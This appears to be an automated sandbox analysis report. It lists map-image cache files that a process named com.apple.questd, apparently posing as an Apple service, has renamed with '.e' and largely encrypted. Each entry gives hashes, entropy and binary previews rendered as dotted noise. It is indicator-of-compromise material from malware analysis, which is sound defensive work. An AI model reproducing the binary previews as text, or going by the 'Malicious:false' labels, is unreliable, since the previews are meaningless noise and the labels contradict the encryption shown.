                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1........1.KL;@.V.~..Q.v.........)Db......mN!.....V......lw.+JC.L~......x.7C.u...._\...^....c...i?xd...|.\......,...T..x...........Ue.;..F.p....cv*...W..]..4...'AO..p..}.Q....9...(Bk.X..B.).jb.....V..$j..z.Z.T..I........Z...ET4...=..L..X$.4h..=U1K.........!."V..+%./...Q...T.J{).w`...U.....z.z.~m.i......A*.................@.....a.~.(....C..t...+9,...............J.y4fu.&>.e..8......L.TJk.'..%..gPR......1.......{#e.#....W.i.s...Q..:n....P..U.....%|...*.1....G.w...J}H7.F=ce..l.....8.5..g...[...AtQ].b......%.^.........N.XLx.&.88:y.Y...h..[.IK..YuWj.z.nm..=.....Y.U.Tu.5...2...`....4........T7.Da...5=.J.e-.-DTJ.../.J....I..f....`....J.j...5.N...'.u..2......w....c.5_c.....Tk....N......6..oQ....k..Y...........V........ajD{[....2...-..I.2.5./9.~XE.7.<..D..Gj.g........p....)..n.JT.,=..+...3.)...Z?.3Z..Vp......;U..d.o....Qe........uf...u....C.HM.C.../1./.7....*...o..4.X....q.f..19....$....[)q...m..Y..=.j!.......Q......|`.+.....
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-golf_course-2@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):56549
                                                                                                    Entropy (8bit):7.996119373580719
                                                                                                    Encrypted:true
                                                                                                    MD5:B629EC10689DF99BF6FF02A9E69219D1
                                                                                                    SHA1:7A3B8178B90EAF97E53D2E4E43665646D8A3BA09
                                                                                                    SHA-256:546FE56119620A2B1E6A0E16BD067484684C1FE97D3CBDC6B05EC4B4ABE9A046
                                                                                                    SHA-512:DEA0EC2ED13553562582F4317AFF8E7ED384008F86BB32B92D351233EA22FE7D79D9FE79DCE93B08C947870BCD6C35AD5E718D53AC65592278515F3717797CBB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w..D..Mu.r.%..oC.c..`tn.:...`.r^k.p.A.f$!...t.......r.0FB..Y,..M.RA...&...K.~M.N.bD.,...'f..j.Bl..#..!..s.n.C../D.!.....v.:.O....RO%w....s...e.]..n.T..C@i...jK...]O9.p..D.Z.....V.Y.:..j6 -..Ba.}..@V......d$If..<.x....u=%i....0i.~..~9i.0[9..........O.......x..F!.2../...l.^...5.R.fH..J......L,.l..I...r@H.....pS.E...*..Vl.......j.X..I..[9p....V.=.#...u?b..6.~..K.mG(S...TJb.......~...B..2S..=.8g[.Y.?...m.4u.M3.J!1w.`=.n .EP...;.7.....<.M.......E...t.[.e.-.P..-[|vITo..*G..}.....h...}.....L..[WZR...a..|..y.D3o...ab.+..........0Y...?.......I.Q7.K..o.&Y......e..W9..\..ut.)...'....j.K..!+_tN.%..N...f..e...f... ...e;.F.o*..T\..\.+...K/y.!...?.IJ..jP...5siACll.f......'_............L\........p..2...w...K..t..R.....8...\.h..Q..7.Y-....A.......V.b.$...$..ssf..0-..7...r.,1N....2.....nx..l..}..J8.`g..1..X$.aS...]..F...C..6..d.E..6...!.3.Wk.;H.$....^....c&.~.>........m.1.......?m.?..I!.....G1....Q*.+`.+.......x.@KV..a.s.<{..
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-land-2.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):706
                                                                                                    Entropy (8bit):6.6018680901182005
                                                                                                    Encrypted:false
                                                                                                    MD5:35C2BF8FB1C3310C7D641EF2ED0B30AC
                                                                                                    SHA1:3F230CE4C21F297EDA9EF1878C3E83A8D563554D
                                                                                                    SHA-256:F5BDAA1E5229CA25063DEB1EE47A69FA7DBA00976D05ADB7DA75F851E5957D64
                                                                                                    SHA-512:236AF09DBCCA80EF656D461C93022FA1E8ACEA4C082E679EEDF701E04B7D604BBC69269148CC80860F283E2B682FF851B6AB97D2BFEF27427455CDD99EAE0F07
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1........1.........Bk#b...[....;.....:E...N.......p.X~..*.-...[..a..la1Z..?..$.L.V1V.3...<}.....V..+..EVaB...&..0..Ve%...-...`.<..i....\..QMs?~...Q.......2..&1 .......E.....=e../_F..L..~...Fx..0.....:..@D.).x...Ve%...-...`.<..i....\..QMs?~...Q.........._....-...[..2........?..$.L.V1V.3...<}.....V....R.4.......h.....#.0.....HY....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-land-2@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1074
                                                                                                    Entropy (8bit):6.720374358458978
                                                                                                    Encrypted:false
                                                                                                    MD5:7F89A8A117B09ACE08CA55B186500072
                                                                                                    SHA1:6EEB6FDFC8D9708BAD2C653FD6E72CA37DF5335E
                                                                                                    SHA-256:81A502E1FB5D74596E099364D63EE66A08AFF5921972F66F2B5F88BEBD5B5D8F
                                                                                                    SHA-512:4BF15DDC77A99197F331096CBAC9F4E412711B6C428058A53F9DA81979A01EE04711E237034FDB20D1BC88DE7862BC6F93139BCFE4DC9A9072BFB5DF7FF5756D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w5..B..M.!..^B..:....'.nZ....:E..=z.9_..>..b.....P%..^i.....r....V.x.+.7-..pilN.........e........Q.H%-U>.r...F:.....A..r.........$......h........Q.H%-U>.r...F:.....A..r.P%..^i.....r....V.x.+.7-..pilN.........el-.r2.1.P%..^i.....r....V.x.+.7-..pilN.........e[O..`...Q.H%-U>.r...F:.....A..r...........xAi...........Q.H%-U>.r...F:..lT.../.`..........)r.......w..noF...A+m|....@..L......Y.Q.H%-U>.r...F:.....A..r.P%..^i.....r....V.x.+.7-..pilN.........e........Q7%S...f...r....V.x.+.7-..pilN.........e........Q.H%-U>...".Za.....A..r.P%..^i..u.Vl.9..kTT}....Q.H%-U>.r...F:.....A..r.P%..^i.....r....V.x.+.7-..pilN.........e........{Z.u...5...r....V.x.+.7-..pilN.........e..(Y..4......_Il..Z/m.....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ...........................................................................
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-land-carplay-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):610
                                                                                                    Entropy (8bit):6.335294749724042
                                                                                                    Encrypted:false
                                                                                                    MD5:245F46676345FF8E84C22565CF09B922
                                                                                                    SHA1:AA2E1B211BBC548278384C23F362A5F1FA04A7F8
                                                                                                    SHA-256:E5B453BC36C378CCADEB4FD90B4C910DC7AC5CF30A37BBED5469410F757D41CE
                                                                                                    SHA-512:812577618859D0960960F70EC477B2DD30A2BACFE65C5A281B9323F636B2E2D8187F7058F1F98E4E26C947DA42E6DD0744058F2D841980116126DAFC65E7F967
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj>8.b$..o......O.p.];......rV...b:Umx..(W....LK....(dp.....w,.i...(..Mn....:..*...T.J'...0mA...e....7.:~...K.....{.gh...SCHr..c.6..&.8..US..@.E..yR.s....6..W.P...&H<.T.=."&.z.....K.....{.gh...SCHr..c.6..&.8..US..@.E..yR.s....6..W.P...&H<.T.=..2Nl. n..9.h,..H.n=..D.lfLp...F...!N.~b...D6.._.1................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-land-carplay-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):922
                                                                                                    Entropy (8bit):6.801146329245799
                                                                                                    Encrypted:false
                                                                                                    MD5:D08D33A9B0EB2F50DFFE75A7CF04B59D
                                                                                                    SHA1:9EBA8C5621C9C9EB646BF4C1441AD9B6A68CCB51
                                                                                                    SHA-256:BD764B7D83C895470A25ECA5F32E51B25EDBC308957FE4A9BA77141C2391AA19
                                                                                                    SHA-512:28D1B6FBE44AA382909FF7592DEB00056DD941A42209D75B0245346C36133F488A510DAF2AFB22EC8D06DFE800175492CA2CE855B47431CE3026D84698C06F29
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj..d.R.{.#....s....|....3..rV...b:Umx..(W....LK....(dp..........tL.h..MXi`...N7.....1.+"..#.`..........p..AD)pi.4S...}.-W.........^.,mp...c....y...@.r>M..7.=S....q.E..0L....O.......5..A.(.].G...c....y...@.r>M..7.=S....q.E..0L....O.......5..A^.wSU.?......"...,.F.l.W7R.d/x.C......p..7..(.E.....5..A^.wSU.?......"...,.F.l.W..L.a.A.......p..AD)pi.4S...}.-W.........^.,mp...c....y.V}..'.........p..AD)pi.4S...}.-W.........^.,mp...c....y...@.r>M..7.=S....q.E..0L....O.......5..Ab...W..(.c....y...@.r>M..7.=S....q.E..0L....O.......5..A^.wSU.?......"...,.F.l.W7R.d/x.C......p.......=.Y|qe..$D....#.0.'..0..P..i................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-park-2.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):19491
                                                                                                    Entropy (8bit):7.980340498541128
                                                                                                    Encrypted:false
                                                                                                    MD5:E028D18C6F2290004AF4B3F337703993
                                                                                                    SHA1:E20404664FA86126F0C857AAFDB9F50A20CD5EF9
                                                                                                    SHA-256:D5B3C94B53FC1AAC5985FDA52C75BE061C4DD2CBB371A5CB4AB10524D696A4CD
                                                                                                    SHA-512:4E8EB0079EDDE9077F9D09DAE60374AC4604193DEE19647CB146609E957E2F04A936492D678B6C16722B1514849C02D801B3E76402CE9DA3641C97D38D83D33C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1........Lm....f.&G..J....2_;....S~|-.....?..l... ,4>*$.t.. .l..f.. [...*Cd..Tb..:..Z.&.X.x..T6...i..&.|..q5P.3....~h....2....G..J.a.....[..........93.kh...M.....*ed...K..L.$B6...SU.Ot..QL:..`}..........e......{.M..1~a....a......}5.j..g....S.{[....,{...DFt-.....,.i.._/.\. ...|.W.....>hEs...G..#+w......Y.p1.S.f/.V ..}....S....b.-sk..6tr/.$..4O.w.xD..p.B.|.....q..%b}.A..'.............%.=.i..Lsg..N.j.P.._S...RB..".J....k....vr....^..A...a.F{.q...;...0..p..Bx_............}H...]Z....H.N..........B.V.C!..H...n.!..^...B..Ay.h........p<?O.......j....1...b`.C(..P.C..y.)J.Z.........:{.4......e.+<...7&..&.PRh8..|...@w./l..S.....W.-}..0...3.Y..&.vo......K.Y....[.M......G.M.sp%....._2{.)..#..%L..S.}..A......s..)O...WBA.(W#.......8.E.,.e.w... .#..?.7...a....A..d..Q...q....x.FF._.G.....a..*F.f.....>...?...P.................\..os..B..$P.o"...;.%....-..P(~.6.?68.r`.....E.`.(.J...0nr.....0j>g.]s*...!.......i.KN..O.....}}...J....g....
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-park-2@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):61653
                                                                                                    Entropy (8bit):7.995908316029642
                                                                                                    Encrypted:true
                                                                                                    MD5:8CCD1A28B67C40EDDE7F39ECCE0BBE72
                                                                                                    SHA1:16BE1EB5C3BAE344F08D9C02B36533D300D27F8D
                                                                                                    SHA-256:47C26308936EB3367F774D146C1B3C626F5769BD16DD56B5AEAA9BCB472B62E6
                                                                                                    SHA-512:8D0EC400E3236574D755BE4B771A13492D1C1F62890C8AA42278C98266D9F0B9601ECE2D23DD78718E01C3342DDB9E5ECA8EC9D5A4190B1CA92889CCCABDC966
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w.x.....w.P..H......J.{.Y...9Z1..)oI_.....hN...kt2...?..!R..s.]$b..D Ic.W..!.b,...hc..Il%...E.. R?S.Z.f..A..s.n.....C...j.%jb)m..Y.'O..k.o?.je.r .a...Is..Mq.XI{.IR..Q...3......M.M...Mv.s.-.."V.....Bz....9f\.....].M9..B}I.rf.q..M.[.OUR.Ss..[..0u${.l..@........JG.t....,..+}.....b..9v.a/...=2u.......................p9..U?v1.xl..rP.8j.v.ege.yD......n..|b.s.n...]@...y...d3q.-V|..\.Ge.3.L...1.>....W....HaBv.^..p..GQ....)........1v.K"M.N.3...?.....\..z.............1.M.;N.{G.@w5.7...@..q'..IK,$9....%.`..9...n......?y.M7......JI.. H...Z.....=!.zK.*6.S.Ip/.......s.k..UR.F....h..U.Z..n.....f..:...q......s%..r...KXW<X.y.U..^#C..*F... @s.8f...?..'.J/........'.....w...t......L:t~.U..X.5...S..RB..BF(.F(..YRc.h.(O.n..W...M..]K..6V.......:...[}...........@D..x..~...cl..ID...%...s.....5..u"E....9.(K.4..BwNL....=.;.`....Q...$..j.2.gy...D.<..1....t.I....SZ8]..$TP.y.2..h..._.w.}K..TkPT.U....&k......F...pMT@.QS........s"..A]r...[
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-water-2.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):8042
                                                                                                    Entropy (8bit):7.941119372646479
                                                                                                    Encrypted:false
                                                                                                    MD5:A3D3F55F0FADDA653389D35AED918940
                                                                                                    SHA1:36EBBF67862B708318C51EDC9143D58A9722F28C
                                                                                                    SHA-256:1F7245E1473CBE40F5121D5765EED09A542D0D3CBA718E6A694A1181F9E51C47
                                                                                                    SHA-512:782FF81CBB2F2B137ACB1E9C353F41D6CB5B94E5A1875D034B7286917189E835D09DF3F9ED0949C01F9C0BD76CDC03B429CE23050C14B05567EECE972CFFC0E8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1.........4..2.2.....".............`....%J7_Q..XD.8..*|...8.f........ E.<...c..HA..<..W......@:a&.}6.....K..iPka._...o....tQ.....W.w..Oe.Wrh$.!`..s.7..W>.,$'/..(^.......#..(.H.#..b3..s...js|.w.pfDH.D!.1N....dE~..y...!...i.....&.1_o..%...+4<....9.=...qD.T=....u.[a........p.)s..$W.G.X..?...}.1.D.J....d.lz3."^v.`.....=3-......$.pc.C.Z..O.....4.....`Yx%.l...e..`Lp...o..........Cf.5.....l.....,.(.4.(G.('.....w...Fw.NK..{l.H .wITW...w;....zx.E).....h..'../e#.).8.. .-.O.rSI.%....3..p..$.K."i...;t..n.....T.9.......4*..!.7..h.Cw...~5V....;.,......3../'.......Y......m.E..h`......"K......:......NJv.<.lPg.H.R...uU.6.[..8A........A...i.&}B.].B.75....$..!#.p.......w.Tv.O1P..Q....z.N.dW}..L%.L.#...A..3a`y......N...x......OLA$.".7..~W...4.=..y....?.U...{......9$6......9..T....g..Eof......F+v.....m..u...W!j..H..W..4i.@7w......o.[.j.X..!t1W._..h..*.".....".....*..,._.....S=.G?0....1/..w..z...Kx7.A3.........*.T..S.6....a.......a.[.x..
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-water-2@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):26555
                                                                                                    Entropy (8bit):7.987451170431744
                                                                                                    Encrypted:false
                                                                                                    MD5:F40C759A04FA97AE96B11499C55C741C
                                                                                                    SHA1:B4305132AA0E1327304662B46DCE275E3BAEDBE3
                                                                                                    SHA-256:36075D97D362FFCDC10154784E7AA86AD4A6810C96CCE67577FAEE95FE5D34C5
                                                                                                    SHA-512:DDC268EDEBAB75B20B86A817E24E830600163B2A70195EF4C14EA751D3B6FB6111AAEEA0B4BEEF3E4E000EBC2F9F1926A67DFDA502D07BBDF16DE0201EE39A2A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w9...........ci..!....Vc.......F%dG....._$......-.9A.E'.....,.9.(........3...2..Lr..p..-..G...p...<.J/............M..I..)....|....u.-.G..F).._.c..5..........f..).,....(|..p.7<.gG.*...Gl.N`.....9.<..B./..m.?..v..\E@..A..6l..'.wx.l..a....l.....w.%..L.-..@4.....:.=IT.>@.LWI...C*.@.^...D..w.4..r..]..n..9 ..>.g..2.xA. n.....=.r.1....%P.......2....r.......*.Bn...<.d...r....22....ThKl.)o.c.`...F..E..M...w..R...pt.K..w...N.k....q..g..D....5.....G.>...s6._...........E.....:p.....,bD...5..i`..:.&%.#|.8N.o..~..F+...~...e......q>./....=...e.....K.O0.(..8.....g.~.....\N.b..`....rS...Y...p..+w...!3v.a...J..0.xS5Z..tI.y....*...L_..:.R.i.......8..PY.....%.z_p|.....S...C.H..3-6/..tG/4.......Lb....~..@..y,.].2.`>....,.._.i....;..;......s.8...S...........1:....Eb....._n....aW..T....}...\."5.nv`&5=WT...q.y"^U.t...F.f.-.........U.(.G.Wj.!....5i/G.p3...!9..s..,..?S.....~:..#<^L..g..... ..p.;]....6.C.l}?.8'......-].....5...@.S...*
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.no_data-2.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):10234
                                                                                                    Entropy (8bit):7.958727082645248
                                                                                                    Encrypted:false
                                                                                                    MD5:0C797F862AB45AF13981A009041CB54A
                                                                                                    SHA1:72D03A1354FB0990002875039ADCB0C3AE34392B
                                                                                                    SHA-256:84B06E3DF7039BB6269413CEF10D8CE022F1798EDB3F2E4EE1E6E270BC50D0C7
                                                                                                    SHA-512:D5E3608F5DFA5A518714F98DED01DE12487A67585ADD847114C5711382163B3292AF05C9A41D21643F2BD8DD96666CBDE7CA43CF35FBF9E45BE9AF4836A13DA2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..91....C.........#....s.".{....._....Z..{[..v..#.[/_bh...99.:)G0^<.....{..z.^......;.QI......\.....-:Z.........(...j|.....K...[..I.f......a.......5O..U5._m......*....w....-\M..h$9?.....1..Mr.."..3G..%.L...K............m...yb...V....z....e.l...qH\............7BS.C.........i0#T...42...z.xk...o...W.Z..=........0.^..[..<8(........^.....u.m/W....6.WY.x...'.].b.Y...x..yQ.....qh.."O.dd.tb.:.W.M[e...hdE....*.....S..vO.KF..."....;..{+[...N..........hx........`y.....M..I.F...+..qo...~Z.[..q...OH..TQD.X.B.|..rt...S..J.U...g.N|....=..!1:.j:.....S..K.x..v.t......#.........C)..].............p....."..........i..*G<....].(?.R.r...-}..V.aU....E..`.....x.S.5t....g.\..K[....U.{..G..h..Dm.E.V,W..y...O..X. .......We9....q#...J.TWz.....q.._jm..+.......D...l.f......].).J.Z.....D...b....S.M.s.....W.z.q......:b.t..........FSp),K}.UQ.\].......;.$..tE.L}..G.%=....B7.!It.@../n.Q..Q].......t.y.&..\t....nc.xFo.<...+i.=.\.'.m........\...:4.9m..*...V....;.wgr....(=.o.'Ys~
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.no_data-2@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):10234
                                                                                                    Entropy (8bit):7.958741093020307
                                                                                                    Encrypted:false
                                                                                                    MD5:3A583A8E41371D922FA30DA6D718C482
                                                                                                    SHA1:787EF11247E6362DF9B88980AE6F85BA997BB1FD
                                                                                                    SHA-256:D1193CE7721AFFBD9DD5653B596AB93A71497A0DBA6077B9F8265E69AFA94232
                                                                                                    SHA-512:49EDBBABB1A88AFE563B426655901E89BCE4FF238AE4177E36EAEF713702CC11B8747D453EE15710F769537293C61F7C9FAFBF8411655719EA1A2D5E96AB770A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..91....C.........#....s.".{....._....Z..{[..v..#.[/_bh...99.:)G0^<.....{..z.^......;.QI......\.....-:Z.........(...j|.....K...[..I.f......a.......5O..U5._m......*....w....-\M..h$9?.....1..Mr.."..3G..%.L...K............m...yb...V....z....e.l...qH\............7BS.C.........i0#T...42...z.xk...o...W.Z..=........0.^..[..<8(........^.....u.m/W....6.WY.x...'.].b.Y...x..yQ.....qh.."O.dd.tb.:.W.M[e...hdE....*.....S..vO.KF..."....;..{+[...N..........hx........`y.....M..I.F...+..qo...~Z.[..q...OH..TQD.X.B.|..rt...S..J.U...g.N|....=..!1:.j:.....S..K.x..v.t......#.........C)..].............p....."..........i..*G<....].(?.R.r...-}..V.aU....E..`.....x.S.5t....g.\..K[....U.{..G..h..Dm.E.V,W..y...O..X. .......We9....q#...J.TWz.....q.._jm..+.......D...l.f......].).J.Z.....D...b....S.M.s.....W.z.q......:b.t..........FSp),K}.UQ.\].......;.$..tE.L}..G.%=....B7.!It.@../n.Q..Q].......t.y.&..\t....nc.xFo.<...+i.=.\.'.m........\...:4.9m..*...V....;.wgr....(=.o.'Ys~
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.park-16.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):31875
                                                                                                    Entropy (8bit):7.989751786627488
                                                                                                    Encrypted:false
                                                                                                    MD5:1AF23A86585C091C702075DDBC2BA859
                                                                                                    SHA1:9BC861FF4FB8805A6DE6E0FE8828357B4775D32A
                                                                                                    SHA-256:2C825B2A4B55D91BC9AC8A59FDAAA13780FB8A4E490628BA8F2076742F2EA341
                                                                                                    SHA-512:D7DC916224C6D107572F208C1B3B2954FDA08EA4CE390D7067B2CA18C4C87377AD75E2EB873DC76648799E03BF6A6682981BC64E38E2DD69B82158A65B279B57
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1..........tr.!~R.......9..>.+?..vT..........*.......=.....9..DWP....#C...y....+....t9.......]@bD..._....."G{<...!.WV.....`...l....F.g.`.N.l@...!Fj.+.n-b..`\..T...R3.....I......4.C.?...}+.O..n.f....e?m.G...=.!#.....U.......8-.........b.\...:/..r....$S.P....w.....I..>..c0,Y..F...f.[a[ot....z..w..O..z.z....._C.3.S....._.....|...-5}.....e....%._. ;c.`|.8..T..U;....3oW.>...t..x..W.."QL.[.YM\.G.....t...a .:3`....'1...lQ./...4O_}..P.P.v.x.%..:.......#.n`T....m.r....c.\........_...OL.?.j..S.M.:..ss.....6.;R....do..R....!!.b..T....=.H......./.V(6E*.;......-YZ..1._.....px#2..4w.*..&y....x.G..g..... X...0.....'..:Y..H..`Q.u..[B.):.V..L(-&w..e..$}.:.o..V1.b_...&W.7..B@..'y.r...EOC.7.[.....$....._.z.'*.......];...m..7r.h.<3.......Pe%A .........).AN....g.@].#.B.1.H.C.d?....I}R.>.Jg...B.n...<$g...f..`.....:..t|j..#C.~.|...Un..G.o..b.u..o..B./Q...D!..t..4..!..zY'^Hi..u......hS3..x[.....y.`.S..3....}...Z.M.-.'>.@..........G.C.;^.2.
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.park-16@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):64445
                                                                                                    Entropy (8bit):7.996325063517053
                                                                                                    Encrypted:true
                                                                                                    MD5:CDD0A0412032C2D49D118DBA80744B67
                                                                                                    SHA1:AE4826A9B233F9BA9F803FDEF2B3D50FC06A3B39
                                                                                                    SHA-256:FD45631ACAED3AF8C609F83816FCF31FEB55D95094B1560461BD0E74D27DE9D9
                                                                                                    SHA-512:8224E681F08D93C43700158AFA24394C32BB526FAB81E6A71CFB990BEB2EE481A53087ECBE1FFD7D6D6A9CBA185CDAD2411B7D59F12647988F89769F52AFCC04
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..wB.......4.2Z&,....................f6..H=k. .G..W.......f ....w....:.O../.Z....{ ..".Jn.........fUuK...Q....I.s...).~..[..p...........j........,..t..Tf<.+........`dMe.1kI.#,{......f..........t4...E......'.n..B.~.,.]......./.t.... .V.!....i.$.|A..1S............:..1....... |o......4.f..1a..S3d.X.YH....7..F...st...@?T..v.....n>.]Ta...Y../......f...*.`O.............<._{z..O....Z......e.<...a.l76Z.%.... &...Sk..az....*.FV>.........h!^..H...Z.H8.V1...3FWI9.....W.....<.Xg..:o..U.....?:.\....|.._...8]!.>....9..."p./A..Dz.^I].0..\.....f>].*.:...:}d..k4H.nGQ.[j.Ez+..Wj.....B.d.......Z5._s.I`..Z.....)..R.....D.:+..:\VW...0..D...^..ab..w'0..%[m[..V....,.A...D..%.......yRDFNi..nK...v4....(3.F..K.E....O.......L.w.3..........JU|...S.QC....f........+..............(.db{3.W.......Wl.\.@._.p........F(...CaD.G..9.A.+.....]=.1....W..u..Wu....BB.z|H..1......R....X<...f..c.......@iz.....x...D..`.~.R5.X...$..p.D:..x$JjDC.`....wc..G
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.road-noise-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):48428
                                                                                                    Entropy (8bit):7.995212669854584
                                                                                                    Encrypted:true
                                                                                                    MD5:321DA285E2F4B4C172663A4464A848B5
                                                                                                    SHA1:2491A03A56286B3FA96AD4FCAFAE5375406DB5A5
                                                                                                    SHA-256:0130B0F264EDCE3EB73A50BEC09DF2BD093235BFEE2707643A6595E6E18429A5
                                                                                                    SHA-512:88AC1F514A7E335FE7DD7AA15571F55A7462B18B7A99555F10AFFA0178ADB882DBC3C2287D625CAD8A4197D3453E2D50EF562B06931D0900245F038E47FE69DF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj..d.R.{.#....s....|....3..rV...b:Umx..(W....LK....(dp....=..........ic.=.2&e...va.F ...Ly.dY.u.m]..P... q.P.P....~...#.lh.n.@.r.........b.mIr...P..p.!+!..S>..'.>,.......-.I..12......S.i\.k.?..MOd.L$/...|...?..)k.}...jkd........1.J......)..q_E...-..11..bDB.....ZT..S........u.k..4]C.&C<..A./..~hr+Z.}.;\.'....}.6...2.....R..8.t..d...2......gW.aVl..%.a.......E.Hx.w......_x8dV~j..Y.VBu>..3.....;..D......NUS)w.r.S.0...:.......91F..k.@.......f.E.k~t:y."z{.K......>......8w.#rK......z.9~ y7o..J.,.....Cm_SK....?.+...)........M...M.G....u4.w.u8SJ=...T..j7...}... h*..h..l|.5.CM.#...2J{.;..+.e.-["&..........zsU?i_...}G.../.c......Kb....."B.4^...fKz.......i....t...-}...t...0....<.......a&.d{gX...f.:7....iC..|\z....N......L......,.......d.}..J....r.:.'.8X...........i$....h.G..o...K*f.<{.):..N..v.B...o&+.|p.U.|)...=R..o...\..*UaN....M#.7.&..N./ ./X+..k.!.L...;.f.z..T.........V.....z|q..e....B...BH..nPn...;......d~..I....L.9...U.......Ba>w....R...r..2....h..1....$.*?...s..,.B.-..F......
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.road-noise-2.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):16066
                                                                                                    Entropy (8bit):7.976883310745678
                                                                                                    Encrypted:false
                                                                                                    MD5:12E8C0E914001C4FF5DDF22367C69D5D
                                                                                                    SHA1:D7DF2E413A3F77BFDA3BA246D04707B4D509CA94
                                                                                                    SHA-256:DAC10BC2748282E7E022B53B87886C307E03E499F8FF28F1F89BD79B6DC80247
                                                                                                    SHA-512:7A9AFD0CD360C23A520269A4D6D2DD624B335E6CB983DB7364A61BB6F769FD5689B295AE833B757625499809BB70FA34A39289996B1CC6CF77B9233DA6E1F4C1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
